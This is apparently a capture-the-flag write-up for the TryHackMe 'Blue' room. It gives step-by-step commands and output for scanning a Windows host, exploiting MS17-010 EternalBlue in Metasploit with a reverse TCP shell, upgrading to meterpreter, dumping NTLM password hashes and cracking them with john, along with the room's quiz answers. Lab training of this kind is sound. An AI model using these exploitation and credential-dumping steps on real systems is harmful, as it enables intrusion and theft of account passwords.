Blue
Room Link: https://tryhackme.com/room/blue
Badges: https://tryhackme.com/ZishanAdThandar/badges/blue
Tools
- NMap https://nmap.org/download
- Metasploit https://www.metasploit.com/download
Recon
- Scan with nmap using command,
nmap 10.10.248.180 --script vuln -p0-1000
Output:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-27 10:57 IST
Nmap scan report for 10.10.248.180
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: ERROR: Script execution failed (use -d to debug)
|_smb-double-pulsar-backdoor: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-conficker: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-cve-2017-7494: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms07-029: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms08-067: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 34.07 seconds
- Question
How many ports are open with a port number under 1000?Answer3 - Question
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)Answerms17-010
Gain Access
- Start Metasploit with
msfconsole - Following next question, searched exploit in metasploit console with
search ms17-010command Output:
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
- Question
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)Ansswerexploit/windows/smb/ms17_010_eternalblue - To use the exploit we typed
use exploit/windows/smb/ms17_010_eternalbluecommand - After checkinh options with
optionscommand, we found that we need to add rhosts withset rhosts 10.10.248.180andset lhost tun0command - Question
Show options and set the one required value. What is the name of this value? (All caps for submission)AnswerRHOSTS
Escalate
- Used payload with command
set payload windows/x64/shell/reverse_tcp - Then
runand wait for some time. search shell_to_meterpreterto find module to upgrade session to meterpreter. Output:
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
- Question
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)Answerpost/multi/manage/shell_to_meterpreter - Question
Select this (use MODULE_PATH). Show options, what option are we required to change?AnswerSESSION - Run the module after setting session. If fails run it again, it will connect.
meterpreter > shell
Process 808 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ps
ps
'ps' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>exit
exit
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM ...........
...............................................................................
...............................................................................
- Use
migrate PROCESS_IDto mmigrate.
Cracking
- Use
hashdumpto hashes. Output:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
- Question
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?AnswerJon - Save hashes in a file named
hash.txtand usejohn --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txtto crack the hash. - Question
Copy this password hash to a file and research how to crack it. What is the cracked password?Answer*******
Find flags
- We can goto
C:\\abd get first flag usingcat flag1.txt.
meterpreter > pwd
C:\Windows\system32
meterpreter > cd C:\\
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:36 +0530 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 08:50:08 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-03-18 03:52:01 +0530 Program Files
040555/r-xr-xr-x 4096 dir 2019-03-18 03:58:38 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:57 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:22 +0530 Recovery
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:55 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-12-13 08:43:28 +0530 Users
040777/rwxrwxrwx 16384 dir 2019-03-18 04:06:30 +0530 Windows
100666/rw-rw-rw- 24 fil 2019-03-18 00:57:21 +0530 flag1.txt
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 hiberfil.sys
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cat flag1.txt
flag{********************************}
- We can use
search -f flag2.txtandsearch -f flag2.txtto find second and third flag to submit, as we already know the first one.
meterpreter > search -f flag2.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Windows\System32\config\flag2.txt 34 2019-03-18 01:02:48 +0530
meterpreter > cat c:\Windows\System32\config\flag2.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.
meterpreter > cat "c:\Windows\System32\config\flag2.txt"
flag{********************************s}
meterpreter > search -f flag3.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\Documents\flag3.txt 37 2019-03-18 00:56:36 +0530
meterpreter > cat "c:\Users\Jon\Documents\flag3.txt"
flag{********************************}
- flag1 :
flag{********************************} - flag2 :
flag{********************************} - flag3 :
flag{********************************}
Author: Zishan Ahamed Thandar